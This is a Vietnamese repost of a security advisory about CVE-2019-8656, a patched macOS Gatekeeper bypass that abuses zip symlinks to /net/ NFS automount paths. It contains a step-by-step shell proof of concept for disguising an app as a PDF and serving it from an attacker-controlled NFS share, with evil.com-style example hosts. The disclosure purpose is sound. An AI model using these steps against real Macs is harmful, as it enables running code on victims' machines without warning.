logo

[CVE-2019-8656] macOS X GateKeeper Bypass

ADMIN
10:33 26/08/2019

Update: 22 Jul 2019

Fix now available: https://support.apple.com/en-gb/HT210348

CVE: CVE-2019-8656

TỔNG QUAN

Các phiên bản macOS X <= 10.14.5 có thể bypass GateKeeper để thực thi các đoạn mã mà không có bất kỳ cảnh báo và sự cho phép từ người dùng.

Gatekeeper là tính năng do Apple phát triển và được đưa vào macOS X từ 2012 có nhiệm vụ ký và xác minh các ứng dụng tải về trước khi chúng được chạy.

CHI TIẾT

Gatekeeper xem các ổ đĩa ngoài và network shares là các vị trí an toàn và cho phép ứng dụng chứa và chạy trên chúng.

Bằng cách kết hợp 2 tính năng trên, có thể thực thi các hành vi một cách hợp pháp.

Tính năng đầu tiên, automount (autofs) cho phép người dùng tự động mount  các network shares bằng cách chỉ truy cập đường dẫn "đặc biệt". Trong trường hợp, đường dẫn bất kỳ đều bắt đầu là "/net/".

Ví dụ:
ls /net/evil-attacker.com/sharedfolder/
hệ điều hành sẽ đọc nội dung của "sharedfolder" trên máy chủ từ xa (evil-attacker.com) bằng NFS.

Tính năng thứ hai, tập tin nén zip chứa các đường dẫn tượng trưng trỏ đến các vị trí tùy ý (bao gồm các vị trí tự động).

Hiểu rõ cách tấn công qua ví dụ sau: Kẻ tấn công tạo ra tệp zip chứa các đường dẫn tượng trưng trỏ đến một nơi mà chúng có thể kiểm soát ( Documents -> /net/evil.com/Documents) và gửi đến nạn nhân. Nạn nhân tải tệp zip sau đó giải nén các đường dẫn tượng trưng đấy.

Bây giờ kẻ tấn đã kiểm soát được máy của nạn nhân được Gatekeeper tin tưởng , do đó bất kỳ thực thi nào trên máy nạn nhận đều không bị cảnh báo. Do thiết kế của Finder (ẩn đuôi mở rộng .app, ẩn đường dẫn đầy đủ trên titlebar) làm cho phương thức tấn công khó phát hiện.

Video minh hoạ: https://youtu.be/m74cpadIPZY

Kết quả hình ảnh cho macOS X GateKeeper Bypass

PoC

  1. create a zip file with a symlink to an automount endpoint
    1. mkdir Documents
    2. ln -s /net/linux-vm.local/nfs/Documents Documents/Documents
    3. zip -ry Documents.zip Documents
  2. create an application (.app folder) with the code you want to run
    1. cp -r /Applications/Calculator.app PDF.app
    2. echo -e '#!/bin/bash'"\n"'open /Applications/iTunes.app' > PDF.app/Contents/MacOS/Calculator
    3. chmod +x PDF.app/Contents/MacOS/Calculator
    4. rm PDF.app/Contents/Resources/AppIcon.icns
    5. ln -s /System/Library/CoreServices/CoreTypes.bundle/Contents/Resources/GenericFolderIcon.icns PDF.app/Contents/Resources/AppIcon.icns
  3. create a publicily accessible NFS share and put the .app in it
    1. ssh linux-vm.local
    2. mkdir -p /nfs/Documents
    3. echo '/nfs/Documents *(insecure,rw,no_root_squash,anonuid=1000,anongid=1000,async,nohide)' >> /etc/exports
    4. service nfs-kernel-server restart
    5. scp -r mymac.local:PDF.app /nfs/Documents/
  4. upload the zip somewhere in internet and download it so it gets the quarantine flag used by Gatekeeper
  5. extract the zip (if needed) and navigate it

Nguồn: https://www.fcvl.net/vulnerabilities/macosx-gatekeeper-bypass

TIN LIÊN QUAN
[Google Capture The Flag 2025] Thông báo giải tính điểm UIT Honors Challenge
𝐆𝐨𝐨𝐠𝐥𝐞 𝐂𝐚𝐩𝐭𝐮𝐫𝐞 𝐓𝐡𝐞 𝐅𝐥𝐚𝐠 được tổ chức bởi nhóm 𝐆𝐨𝐨𝐠𝐥𝐞 𝐒𝐞𝐜𝐮𝐫𝐢𝐭𝐲, có những thử thách từ các hạng mục khác nhau như: 𝐖𝐞𝐛, 𝐏𝐰𝐧, 𝐂𝐫𝐲𝐩𝐭𝐨, 𝐑𝐞𝐯𝐞𝐫𝐬𝐢𝐧𝐠, 𝐌𝐢𝐬𝐜. Thông tin về 𝐆𝐨𝐨𝐠𝐥𝐞 𝐂𝐚𝐩𝐭𝐮𝐫𝐞 𝐓𝐡𝐞 𝐅𝐥𝐚𝐠 𝟐𝟎𝟐𝟓 như sau: Thời gian diễn ra: Từ sáng 𝟏𝐡𝟎𝟎 ngày 𝟐𝟖/𝟎𝟔/𝟐𝟎𝟐𝟓 (Thứ 7) đến sáng...
WANNASETUP 2025 – Cuộc thi setup góc học tập giành cho sinh viên UIT
SỰ KIỆN "WANNASETUP" ĐÃ CHÍNH THỨC BẮT ĐẦU! Bạn có đang sở hữu một góc học tập/làm việc siêu chất khiến ai nhìn cũng trầm trồ? Bạn có những món đồ chơi công nghệ độc đáo như bàn phím cơ “đỉnk kao”, dàn màn hình “Vip Pro” hỗ trợ tối...
Tuyển thực tập sinh – Phòng Thí nghiệm An toàn Thông tin – Kỳ hè 2025
Phòng Thí nghiệm An toàn Thông tin chào đón các bạn sinh viên đam mê lĩnh vực an ninh mạng và kiểm thử xâm nhập tham gia chương trình Thực tập Nghiên cứu (Research Intern) - Mùa hè năm 2025. Trong thời gian thực tập, các bạn sẽ có cơ...